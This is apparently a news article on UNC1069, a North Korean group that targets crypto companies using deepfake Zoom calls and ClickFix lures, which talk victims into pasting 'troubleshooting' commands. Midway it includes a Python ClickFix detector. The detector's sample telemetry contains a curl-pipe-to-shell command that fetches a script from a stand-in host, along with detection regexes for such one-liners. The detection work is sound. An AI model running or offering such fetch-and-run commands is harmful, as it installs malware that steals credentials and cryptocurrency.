North Korean hackers are running highly targeted cyberattacks against companies in the cryptocurrency sector, combining AI-generated deepfake videos with ClickFix, a social engineering technique in which the victim is talked into copying and running attacker-supplied commands, to deliver malware on both macOS and Windows systems.

The campaign appears financially motivated and is focused on stealing sensitive data and cryptocurrency-related assets.

According to researchers from Mandiant, the activity was observed during the investigation of an attack on a fintech company. The researchers attributed the operation to UNC1069, a North Korean threat group that has been active since 2018 and is known for adapting its tactics to match high-value targets.

The attack relied heavily on social engineering. The victim was first contacted on Telegram by an account impersonating a senior executive from a cryptocurrency company. After gaining trust, the attackers shared a Calendly link that redirected the victim to a fake Zoom meeting page hosted on attacker-controlled infrastructure. During the meeting, the victim was shown what appeared to be a deepfake video of a well-known crypto CEO.

Mandiant says the attackers pretended there were audio problems during the call and instructed the victim to copy and run "troubleshooting" commands shown on the fake meeting page. Because the victim executes the commands themselves, no exploit is needed; the commands start the infection process, with separate payloads for Windows and macOS.

On macOS, the infection chain involved AppleScript execution followed by the deployment of a malicious Mach-O binary. Researchers identified seven malware families: WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT, DEEPBREATH, SUGARLOADER, and CHROMEPUSH. These tools were used to steal credentials, browser data, keychain information, and Telegram data, and even to disrupt communications. Three of them, SILENCELIFT, DEEPBREATH, and CHROMEPUSH, were previously undocumented.
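The chain described above, commands pasted into a terminal by the user, AppleScript run through osascript, and a Mach-O dropped into a temporary path, is a sequence that endpoint process telemetry can flag. The following Python is an added example and is not code from Mandiant or from this article: it applies a simple ClickFix heuristic to constructed process-start events in an assumed, generic EDR-style JSON shape. The host name, paths, process IDs and field names are invented for illustration.

```python
import json
import re
from collections import defaultdict

# Constructed sample telemetry (not from the report): one process-start event per line.
# The field names (ts, pid, ppid, user, exe, cmdline) are an assumed generic EDR shape.
SAMPLE_EVENTS = """
{"ts": 0, "pid": 400, "ppid": 1,   "user": "alice", "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "cmdline": "Terminal"}
{"ts": 1, "pid": 501, "ppid": 400, "user": "alice", "exe": "/bin/zsh", "cmdline": "zsh -l"}
{"ts": 2, "pid": 612, "ppid": 501, "user": "alice", "exe": "/usr/bin/osascript", "cmdline": "osascript -e 'do shell script \\"curl -fsSL https://example.invalid/zoom-audio-fix.sh | sh\\"'"}
{"ts": 3, "pid": 620, "ppid": 612, "user": "alice", "exe": "/bin/sh", "cmdline": "sh -c curl -fsSL https://example.invalid/zoom-audio-fix.sh | sh"}
{"ts": 4, "pid": 621, "ppid": 620, "user": "alice", "exe": "/usr/bin/curl", "cmdline": "curl -fsSL https://example.invalid/zoom-audio-fix.sh"}
{"ts": 5, "pid": 622, "ppid": 620, "user": "alice", "exe": "/bin/sh", "cmdline": "sh"}
{"ts": 6, "pid": 630, "ppid": 622, "user": "alice", "exe": "/private/tmp/.zoomfix/audio_fix", "cmdline": "/private/tmp/.zoomfix/audio_fix"}
{"ts": 7, "pid": 700, "ppid": 501, "user": "alice", "exe": "/usr/bin/osascript", "cmdline": "osascript -e 'display notification \\"build done\\"'"}
{"ts": 8, "pid": 710, "ppid": 501, "user": "alice", "exe": "/bin/ls", "cmdline": "ls -la"}
"""

# Terminal emulators: a ClickFix command is typed or pasted by the user, so one of these
# sits above the script host in the process tree. Hypothetical, extend for your fleet.
TERMINAL_APPS = {"Terminal", "iTerm2", "Warp", "Alacritty"}
SCRIPT_HOSTS = {"osascript", "sh", "bash", "zsh"}
# Download-and-execute or decode-and-execute idioms typical of pasted one-liners.
SHELL_DOWNLOAD = re.compile(
    r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b|base64\s+(-d|--decode)|do shell script", re.I)
# User-writable staging locations a dropped Mach-O is likely to run from.
STAGED_PATH = re.compile(r"^(/private)?/tmp/|^/var/folders/|/Library/Caches/|^/Users/[^/]+/\.")


def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def basename(path):
    return path.rsplit("/", 1)[-1]


def build_tree(events):
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def ancestors(pid, by_pid):
    """Yield parent, grandparent, ... of pid until the telemetry has no parent record."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        parent = by_pid[pid]["ppid"]
        if parent not in by_pid:
            return
        yield by_pid[parent]
        pid = parent


def descendants(pid, children, by_pid):
    stack = list(children.get(pid, []))
    while stack:
        child = stack.pop()
        yield by_pid[child]
        stack.extend(children.get(child, []))


def find_clickfix_chains(events):
    """Return one alert per chain: a terminal-launched script host running a
    download/decode one-liner, plus any descendant executed from a staging path."""
    by_pid, children = build_tree(events)
    matched = [e for e in events
               if basename(e["exe"]) in SCRIPT_HOSTS and SHELL_DOWNLOAD.search(e["cmdline"])]
    matched_pids = {e["pid"] for e in matched}
    alerts = []
    for e in matched:
        anc = list(ancestors(e["pid"], by_pid))
        if any(a["pid"] in matched_pids for a in anc):
            continue  # a parent already covers this chain; report the root once
        if not any(basename(a["exe"]) in TERMINAL_APPS for a in anc):
            continue  # not user-pasted; scripted automation is a different problem
        staged = [d["exe"] for d in descendants(e["pid"], children, by_pid)
                  if STAGED_PATH.search(d["exe"])]
        alerts.append({"pid": e["pid"], "user": e["user"],
                       "cmdline": e["cmdline"], "staged_binaries": staged})
    return alerts


if __name__ == "__main__":
    print(json.dumps(find_clickfix_chains(parse_events(SAMPLE_EVENTS)), indent=2))
```

On the constructed sample this reports a single chain rooted at the osascript process (pid 612) with the binary under /private/tmp as its staged payload, and ignores the benign osascript notification and the ls. The terminal-ancestor check is what separates ClickFix from ordinary scripted curl-pipe-sh installs; tune TERMINAL_APPS and STAGED_PATH to your environment before relying on it.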

Of all the malware identified, SUGARLOADER had the highest detection rate on VirusTotal, while most of the others had little to no prior detection, meaning signature-based antivirus would be unlikely to catch them and highlighting how stealthy and targeted the campaign was. Mandiant noted that deploying so many different malware tools against a single victim is unusual and points to a deliberate effort to extract as much data as possible.

The researchers believe the stolen data serves two purposes: direct cryptocurrency theft and enabling future social engineering attacks by exploiting the victim's identity and private information. A similar technique was reported in mid-2025 by Huntress researchers, who linked it to BlueNoroff, another North Korean group also tracked as Sapphire Sleet and TA444.

Mandiant says UNC1069 has steadily evolved over the years. After initially targeting various sectors, the group shifted its focus to the Web3 industry in 2023, including exchanges, developers, and venture capital firms. In 2025, the hackers expanded further into financial services, payments, brokerage platforms, and crypto wallet infrastructure, signaling a continued and growing threat to the global cryptocurrency ecosystem.